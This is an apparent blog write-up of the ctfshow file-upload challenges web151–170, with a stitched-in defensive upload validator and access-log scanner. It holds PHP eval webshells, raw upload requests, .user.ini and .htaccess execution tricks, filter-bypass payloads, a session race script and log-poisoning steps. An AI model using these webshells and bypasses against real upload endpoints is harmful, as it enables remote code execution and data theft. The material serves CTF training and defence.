File Upload
web151
Challenge description
A new starting point, keep it up!
Solution approach
Viewing the page source shows
<div class="layui-row">
<div class="layui-col-md12">
<button type="button" class="layui-btn" id="upload" lay-data="{url: 'upload.php', accept: 'images',exts:'png'}">
<i class="layui-icon"></i>上传图片
</button>
</div>
</div>
Only png files can be uploaded, so write a one-line PHP shell in a txt file,
<?php @eval($_POST["123"]);?>
change its extension to png, upload it through Burp, change png back to php in the intercepted request, and the upload is reported as successful; then connect with AntSword and browse to flag.php
ctfshow{84946f9f-1021-4ad4-aa54-edf546a1b06e}
web152
Challenge description
The backend must not rely on a single check
Solution approach
Exactly the same steps as the previous challenge; nothing more to say
ctfshow{c296b64a-4f04-4102-b85f-1eaa582a9d75}
web153
Challenge description
The backend must not rely on a single check
Solution approach
Trying the same approach as before, the upload fails with "file type not allowed", which means there is a WAF in front of it. The first idea is to upload a .htaccess file, but the server runs nginx, so that does nothing; a .user.ini file can be uploaded instead.
A .user.ini file is similar to PHP's php.ini; both are PHP configuration files. .user.ini is more broadly usable than .htaccess: whether the server is nginx, Apache or IIS, any PHP that runs under FastCGI will honour it.
And .ini files are still allowed through the upload.
POST /upload.php HTTP/1.1
Host: 3277805e-6a76-4072-99ae-2237a90eb8fb.challenge.ctf.show
Content-Length: 206
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryv0k4Ho2WfgKjvEM4
Origin: http://71e8908e-4639-4593-9a50-f90d7587eb7e.challenge.ctf.show
Referer: http://71e8908e-4639-4593-9a50-f90d7587eb7e.challenge.ctf.show/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
------WebKitFormBoundaryv0k4Ho2WfgKjvEM4
Content-Disposition: form-data; name="file"; filename=".user.ini"
Content-Type: image/png
auto_prepend_file=123.png
------WebKitFormBoundaryv0k4Ho2WfgKjvEM4--
Then upload the file that will be included
POST /upload.php HTTP/1.1
Host: 3277805e-6a76-4072-99ae-2237a90eb8fb.challenge.ctf.show
Content-Length: 204
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryv0k4Ho2WfgKjvEM4
Origin: http://71e8908e-4639-4593-9a50-f90d7587eb7e.challenge.ctf.show
Referer: http://71e8908e-4639-4593-9a50-f90d7587eb7e.challenge.ctf.show/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
------WebKitFormBoundaryv0k4Ho2WfgKjvEM4
Content-Disposition: form-data; name="file"; filename="123.png"
Content-Type: image/png
<?php eval($_POST[123]);?>
------WebKitFormBoundaryv0k4Ho2WfgKjvEM4--
Now connect with AntSword; the URL is http://3277805e-6a76-4072-99ae-2237a90eb8fb.challenge.ctf.show/upload/
Find the flag
ctfshow{600782c9-66b1-40b0-8ac3-a168dc394205}
web154
Challenge description
The backend must not rely on a single check (2)
Solution approach
This time a check on the file content was added too: if the content contains "php" the upload is refused, so use <?= instead of <?php to get past it. Otherwise it is the same as before: upload the .ini first
POST /upload.php HTTP/1.1
Host: f11ee8dd-6db9-45bd-871a-077f9dc3f25f.challenge.ctf.show
Content-Length: 215
X-Requested-With: XMLHttpRequest
Accept-Language: zh-CN,zh;q=0.9
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybEiRWfZt73j05UYD
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Origin: http://f11ee8dd-6db9-45bd-871a-077f9dc3f25f.challenge.ctf.show
Referer: http://f11ee8dd-6db9-45bd-871a-077f9dc3f25f.challenge.ctf.show/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
------WebKitFormBoundarybEiRWfZt73j05UYD
Content-Disposition: form-data; name="file"; filename=".user.ini"
Content-Type: image/png
auto_prepend_file=1.png
------WebKitFormBoundarybEiRWfZt73j05UYD--
POST /upload.php HTTP/1.1
Host: f11ee8dd-6db9-45bd-871a-077f9dc3f25f.challenge.ctf.show
Content-Length: 215
X-Requested-With: XMLHttpRequest
Accept-Language: zh-CN,zh;q=0.9
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybEiRWfZt73j05UYD
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Origin: http://f11ee8dd-6db9-45bd-871a-077f9dc3f25f.challenge.ctf.show
Referer: http://f11ee8dd-6db9-45bd-871a-077f9dc3f25f.challenge.ctf.show/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
------WebKitFormBoundarybEiRWfZt73j05UYD
Content-Disposition: form-data; name="file"; filename="1.png"
Content-Type: image/png
<?=eval($_POST[1]);
------WebKitFormBoundarybEiRWfZt73j05UYD--
After that the connection succeeds; find the flag
ctfshow{51be4ea6-e6f2-40af-abed-bc3e92ba2133}
web155
Challenge description
The backend must not rely on a single check (3)
Solution approach
Same as the previous challenge
POST /upload.php HTTP/1.1
Host: 249c3f82-462a-4ea3-a501-7b90ba9c0954.challenge.ctf.show
Content-Length: 209
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: zh-CN,zh;q=0.9
Sec-Ch-Ua: "Not)A;Brand";v="8", "Chromium";v="138"
Sec-Ch-Ua-Mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary2mrn6xE4hVODEgEF
Origin: https://249c3f82-462a-4ea3-a501-7b90ba9c0954.challenge.ctf.show
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://249c3f82-462a-4ea3-a501-7b90ba9c0954.challenge.ctf.show/
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive
------WebKitFormBoundary2mrn6xE4hVODEgEF
Content-Disposition: form-data; name="file"; filename=".user.ini"
Content-Type: image/png
auto_prepend_file=1.png
------WebKitFormBoundary2mrn6xE4hVODEgEF--
POST /upload.php HTTP/1.1
Host: 249c3f82-462a-4ea3-a501-7b90ba9c0954.challenge.ctf.show
Content-Length: 209
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: zh-CN,zh;q=0.9
Sec-Ch-Ua: "Not)A;Brand";v="8", "Chromium";v="138"
Sec-Ch-Ua-Mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary2mrn6xE4hVODEgEF
Origin: https://249c3f82-462a-4ea3-a501-7b90ba9c0954.challenge.ctf.show
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://249c3f82-462a-4ea3-a501-7b90ba9c0954.challenge.ctf.show/
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive
------WebKitFormBoundary2mrn6xE4hVODEgEF
Content-Disposition: form-data; name="file"; filename="1.png"
Content-Type: image/png
<?=eval($_POST[1]);
------WebKitFormBoundary2mrn6xE4hVODEgEF--
Connect with AntSword to get the flag
ctfshow{119dfdba-c52c-4112-9e50-e323322bb545}
web156
Challenge description
The backend must not rely on a single check (4)
Solution approach
Following the previous approach gives "file type not allowed"; testing shows that [] is filtered, so use {} instead
Change the content of 1.png to
<?=eval($_POST{1});
and the connection succeeds; find the flag
ctfshow{6d82075f-9de4-4493-b3e2-35654a4dc1cb}
web157
Challenge description
The backend must not rely on a single check (5)
Solution approach
This one filters {} as well, so a one-line eval shell is hard to write; instead put PHP code that runs a command directly into the png, with the rest of the flow unchanged
<? system('tac ../f*') ?>
Visit the URL + /upload/ to get the flag
ctfshow{99a7d4f9-9f4d-44cd-96f5-b260f66bfd77}
web158
Challenge description
The backend must not rely on a single check (6)
Solution approach
Same upload as the previous challenge
ctfshow{800c2cf9-a9b4-479f-8f3d-09416b36ed9b}
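The defender's side of web151 through web158, as an added example that is not part of this writeup or of the challenge code: a Python upload validator that refuses the whole class of uploads shown above (dotfiles such as .user.ini, double extensions, non-PNG bytes behind a PNG or GIF header, and PHP open tags hidden inside a real image) instead of blocklisting the strings "php", "[]" and "{}" one variant at a time. The allowed extension, the size limit and the file names are assumptions of this example, and the sample PNG is constructed inside the block.

```python
# Added example, not part of the ctfshow writeup or the challenge source:
# an allowlist-based upload validator that rejects the whole class of
# tricks used in web151-158 instead of blocklisting each variant.
import re
import struct
import zlib
from typing import Tuple

ALLOWED_EXT = {"png"}                       # assumption: the site only needs PNG
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
# Any PHP open tag: "<?php", the echo form "<?=", and the bare short tag "<?"
# that the writeup falls back to once the substring "php" is filtered.
PHP_OPEN_TAG = re.compile(rb"<\?")
# Config files the web server or PHP would honour inside the upload directory.
CONFIG_NAMES = {".user.ini", ".htaccess", "php.ini", "web.config"}


def png_chunks_well_formed(data: bytes) -> bool:
    """Walk the PNG chunk list and check every CRC.  Requires IHDR first,
    IEND last and nothing after IEND, so a shell appended to a real image
    or a bare "GIF89a"-style header prefix is rejected as not an image."""
    if not data.startswith(PNG_MAGIC):
        return False
    pos, first, last = len(PNG_MAGIC), None, None
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        payload = data[pos + 8:pos + 8 + length]
        crc_bytes = data[pos + 8 + length:pos + 12 + length]
        if len(payload) != length or len(crc_bytes) != 4:
            return False
        if zlib.crc32(ctype + payload) != struct.unpack(">I", crc_bytes)[0]:
            return False
        first = first or ctype
        last = ctype
        pos += 12 + length
        if ctype == b"IEND":
            break
    return first == b"IHDR" and last == b"IEND" and pos == len(data)


def validate_upload(filename: str, content: bytes, max_bytes: int = 2_000_000) -> Tuple[bool, str]:
    """Return (accepted, reason).  Every rule is an allowlist or a hard
    reject; nothing tries to "clean" a bad upload into an acceptable one."""
    base = filename.rsplit("/", 1)[-1].rsplit("\\", 1)[-1]
    if base != filename or base in ("", ".", ".."):
        return False, "path components are not allowed in a filename"
    if base.startswith(".") or base.lower() in CONFIG_NAMES:
        return False, "dotfiles and server config files are rejected"
    parts = base.lower().split(".")
    if len(parts) != 2:                         # exactly one extension: no a.php.png
        return False, "filename must be name.ext with a single extension"
    name, ext = parts
    if ext not in ALLOWED_EXT:
        return False, "extension ." + ext + " is not in the allowlist"
    if not re.fullmatch(r"[a-z0-9_-]{1,64}", name):
        return False, "basename contains characters outside [a-z0-9_-]"
    if len(content) > max_bytes:
        return False, "file too large"
    if not png_chunks_well_formed(content):
        return False, "content is not a well-formed PNG"
    # Structure alone is not enough: if the file is ever included, PHP runs
    # anything between "<?" and "?>" wherever it sits, a tEXt chunk included.
    if PHP_OPEN_TAG.search(content):
        return False, "PHP open tag found inside image data"
    return True, "ok"


def _chunk(ctype: bytes, payload: bytes) -> bytes:
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", zlib.crc32(ctype + payload))


def make_png(text_comment: bytes = b"") -> bytes:
    """Constructed sample input: a valid 1x1 grayscale PNG, optionally with a
    tEXt chunk so the tag scan can be exercised on a structurally valid file."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)   # 1x1, 8-bit, grayscale
    idat = zlib.compress(b"\x00\x00")                     # filter byte + one pixel
    text = _chunk(b"tEXt", b"Comment\x00" + text_comment) if text_comment else b""
    return PNG_MAGIC + _chunk(b"IHDR", ihdr) + text + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")


if __name__ == "__main__":
    # Payload shapes taken from the writeup; each one is refused.
    for fname, body in [
        ("cat.png", make_png()),
        (".user.ini", b"auto_prepend_file=123.png"),
        ("123.php", b'<?php @eval($_POST["123"]);?>'),
        ("1.png", b"GIF89a<?=eval($_POST{1});"),
        ("1.png", make_png() + b"<? system('tac ../f*') ?>"),
        ("1.png", make_png(b"<?include '/var/log/nginx/access.log'?>")),
    ]:
        print(fname, validate_upload(fname, body))
```

In a real deployment the accepted file would also be stored under a server-generated name outside the web root, or in a directory the web server never hands to PHP, so that even a validator bug cannot turn an upload into code execution. The scan for "<?" is the last line of defence: a compressed image can in rare cases contain those two bytes by chance, and when that matters the cleaner answer is to re-encode the image rather than to accept it as-is.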
web159
Challenge description
You masters have got this
Solution approach
This time (), ``, log and ; are filtered as well; use include to pull in the log file, changing the content of the uploaded png to
<?include '/var/lo'.'g/nginx/access.l'.'og'?>
The earlier command execution approach also works
<?=`tac ../f*`?>
ctfshow{ebf02e41-db90-4aa8-a88d-5988546c8194}
web160
Challenge description
You masters have got this
Solution approach
Spaces are filtered; use a PHP stream wrapper to read the source
<?=include"ph"."p://filter/convert.base64-encode/resource=../flag.p"."hp"?>
PD9waHANCg0KLyoNCiMgLSotIGNvZGluZzogdXRmLTggLSotDQojIEBBdXRob3I6IGgxeGENCiMgQERhdGU6ICAgMjAyMC0wOS0yMSAyMTozMToyMw0KIyBATGFzdCBNb2RpZmllZCBieTogICBoMXhhDQojIEBMYXN0IE1vZGlmaWVkIHRpbWU6IDIwMjAtMTAtMTYgMjI6NDE6NDANCiMgQGVtYWlsOiBoMXhhQGN0ZmVyLmNvbQ0KIyBAbGluazogaHR0cHM6Ly9jdGZlci5jb20NCg0KKi8NCg0KDQokZmxhZz0iY3Rmc2hvd3s5OWFiN2M3MC0yOWU2LTRkODAtODg5Ni1jZWI2NGJkN2IyODN9Ijs=
Decoding it gives
ctfshow{99ab7c70-29e6-4d80-8896-ceb64bd7b283}
web161
Challenge description
Go easy on me, lions and tigers, sob sob
Solution approach
Uploading the .user.ini file reports a wrong file type; adding a GIF header (GIF89a) makes it go through. Keep the GIF header when uploading the png afterwards too
<?=include"ph"."p://filter/convert.base64-encode/resource=../flag.p"."hp"?>
base64-decoding it gives the flag
ctfshow{c5c6e0eb-013b-4ae6-a400-f0d8c273d7f4}
web162
Challenge description
Quite a lot of tricks, huh? Huh?
Solution approach
The dot . is filtered
Reference writeup: ctfshow web入门 文件上传 web162–web167 - 技术栈
That author's script
import requests
import threading
import re
session = requests.session()
sess = 'hhh'  # the name you chose when uploading earlier
url1 = "http://12d363d9-266c-4a6d-bb94-1a2ce754c8f7.challenge.ctf.show/"
url2 = "http://12d363d9-266c-4a6d-bb94-1a2ce754c8f7.challenge.ctf.show/upload"
data1 = {
    'PHP_SESSION_UPLOAD_PROGRESS': '<?php system("tac ../f*");?>'
}
file = {
    'file': 'yu22x tql'  # the file name, anything will do
}
cookies = {
    'PHPSESSID': sess
}
def write():  # the upload side of the race
    while True:
        r = session.post(url1, data=data1, files=file, cookies=cookies)
def read():
    while True:  # after each round, fetch url/upload and check for the flag
        r = session.get(url2)
        if 'flag' in r.text:
            flag = re.compile('ctfshow{.+}')  # when I did this the flag format had already changed to ctfshow{}
            print(flag.findall(r.text))
threads = [threading.Thread(target=write),
           threading.Thread(target=read)]
for t in threads:
    t.start()
First upload the configuration file with the content
GIF89a
auto_append_file=/tmp/sess_hhh
Run the script to get the flag
ctfshow{de15f48a-986e-47cf-b9a5-5a0e19c0cbfe}
web163
Challenge description
Mutual destruction
Solution approach
Change the parameters of the previous challenge's script to get the flag
web164, 165
Second-pass image rendering; I did not manage to reproduce these
web166
Challenge description
Etched in my bones
Solution approach
Viewing the source gives
<div class="layui-row">
<div class="layui-col-md12">
<button type="button" class="layui-btn" id="upload" lay-data="{url: 'upload.php', accept: 'images',exts:'zip'}">
<i class="layui-icon"></i>上传文件
</button>
</div>
</div>
A zip has to be uploaded: zip up any file, open the archive in Notepad and append a one-line shell at the end, then upload it. The file can then be downloaded, which looks like the inclusion point: start capturing, click download, send the request to Repeater and send it once, then change the request method and the POST parameter to get the flag
web167
Challenge description
httpd
Solution approach
Only jpg can be uploaded here
<div class="layui-row">
<div class="layui-col-md12">
<button type="button" class="layui-btn" id="upload" lay-data="{url: 'upload.php', accept: 'images',exts:'jpg'}">
<i class="layui-icon"></i>上传文件
</button>
</div>
</div>
Upload the .htaccess configuration file. It cannot be uploaded directly: either upload any jpg image and change the filename and content in Burp, or upload .htaccess.jpg and delete the suffix in Burp
<FilesMatch ".jpg">
SetHandler application/x-httpd-php
</FilesMatch>
Then upload a jpg containing a one-line shell, connect with AntSword and find the flag
ctfshow{8e7ad1c3-b732-462a-a5da-ba8f5885ae20}
web168
Challenge description
Basic evasion
Solution approach
Still only png is accepted, but after getting past the front-end check the extension can be changed to php in Burp. First try directly
<?=`tac ../flag.php`?>
That fails; change the file content to
<?=`ls ../`?>
This finds flagaa.php; read it
ctfshow{717b2b45-a28b-4dab-b19e-2a9f8ef3bd69}
web169
Challenge description
Advanced evasion
Solution approach
Uploading shows that <?, php and the like are all filtered, so only file inclusion is left; this challenge can be done with log inclusion
The server is nginx; upload a .user.ini to include the log
For the inclusion to work, the upload directory needs an index.php; since there is none, first upload an index.php with arbitrary content (I wrote 123)
POST /upload.php HTTP/1.1
Host: de9ad5f8-4af4-4a41-9a9e-b39e4d09abbe.challenge.ctf.show
Content-Length: 185
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: zh-CN,zh;q=0.9
Sec-Ch-Ua: "Not)A;Brand";v="8", "Chromium";v="138"
Sec-Ch-Ua-Mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYzBNokwJpeBhBOQo
Origin: https://de9ad5f8-4af4-4a41-9a9e-b39e4d09abbe.challenge.ctf.show
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://de9ad5f8-4af4-4a41-9a9e-b39e4d09abbe.challenge.ctf.show/
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive
------WebKitFormBoundaryYzBNokwJpeBhBOQo
Content-Disposition: form-data; name="file"; filename="index.php"
Content-Type: image/png
123
------WebKitFormBoundaryYzBNokwJpeBhBOQo--
Then upload .user.ini
auto_append_file=/var/log/nginx/access.log
Visit the location of the uploaded file, put a one-line shell in the User-Agent, then POST 1=system("ls ../"); first and 1=system("tac ../flagaa.php"); next to get the flag. Oddly, in 169 the log entry did not get written, but in 170 it did
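Detection for the log poisoning used in web159 and web169-170, as an added example that is not from this writeup: a Python scanner over nginx combined-format access log lines that flags PHP open tags in any client-controlled field (the poisoning step) and script or config requests under the upload directory (the include step). The log lines are constructed, and the upload path is an assumption.

```python
# Added example, not from the writeup: detection logic for the nginx log
# poisoning used in web159 and web169-170, run over constructed log lines.
# The upload directory name is this example's assumption.
import re
from typing import List, Tuple

# nginx "combined" format: addr - user [time] "request" status bytes "referer" "user-agent"
COMBINED = re.compile(
    r'^(?P<addr>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
PHP_OPEN_TAG = re.compile(r"<\?")          # "<?php", "<?=" and bare "<?" alike
UPLOAD_DIR = "/upload/"                    # assumption: the site's upload directory
CONFIG_NAMES = {".user.ini", ".htaccess"}


def _unescape(field: str) -> str:
    """nginx writes '"' and non-printable bytes as \\xHH in the log; undo that
    so a tag such as <?php system(\\x22id\\x22)?> is scanned as the client sent it."""
    return re.sub(r"\\x([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), field)


def scan_access_log(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (line number, rule, evidence) for every suspicious entry.
    Rule 1: a PHP open tag in any client-controlled field, which is what an
    include of the log file would later execute.  Rule 2: a request for a
    .php file, a config file or a traversal under the upload directory."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = COMBINED.match(line)
        if not m:
            findings.append((n, "unparseable", line[:80]))
            continue
        for field in ("request", "referer", "ua"):
            value = _unescape(m.group(field))
            if PHP_OPEN_TAG.search(value):
                findings.append((n, "php-tag-in-" + field, value))
        parts = m.group("request").split()
        path = parts[1].split("?", 1)[0] if len(parts) >= 2 else ""
        base = path.rsplit("/", 1)[-1]
        if path.startswith(UPLOAD_DIR) and (base.endswith(".php") or base in CONFIG_NAMES or ".." in path):
            findings.append((n, "script-under-upload-dir", path))
    return findings


# Constructed sample log: one benign listing, one poisoned User-Agent, one
# request that reaches index.php under the upload directory, one tag in the
# query string (escaped quotes as nginx would write them), one benign line.
SAMPLE_LOG = """\
10.0.0.5 - - [07/Oct/2025:12:00:01 +0000] "GET /upload/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [07/Oct/2025:12:00:07 +0000] "GET /upload/ HTTP/1.1" 200 512 "-" "<?php system($_POST[1]);?>"
10.0.0.9 - - [07/Oct/2025:12:00:09 +0000] "POST /upload/index.php HTTP/1.1" 200 88 "-" "Mozilla/5.0"
10.0.0.9 - - [07/Oct/2025:12:00:11 +0000] "GET /upload/?c=<?php system(\\x22id\\x22)?> HTTP/1.1" 200 12 "-" "curl/8.0"
10.0.0.7 - - [07/Oct/2025:12:00:15 +0000] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
""".splitlines()

if __name__ == "__main__":
    for n, rule, evidence in scan_access_log(SAMPLE_LOG):
        print(f"line {n}: {rule}: {evidence}")
```

The first rule fires on the poisoning request itself, before any include happens, which is the point: a tag in a User-Agent has no legitimate reason to exist and is cheap to alert on. The second rule is the companion hardening check; PHP files and .user.ini have no business being served from an upload directory, and a request for one is worth a look even when it returns 404.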
web170
Challenge description
Ultimate evasion
Solution approach
Same as 169
ctfshow{9452fea1-a9c1-4c56-9b0a-d2fa3477dd18}
Title: ctfshow file upload. Source: http://www.roclinux.cn/b/1759886072a3134816.html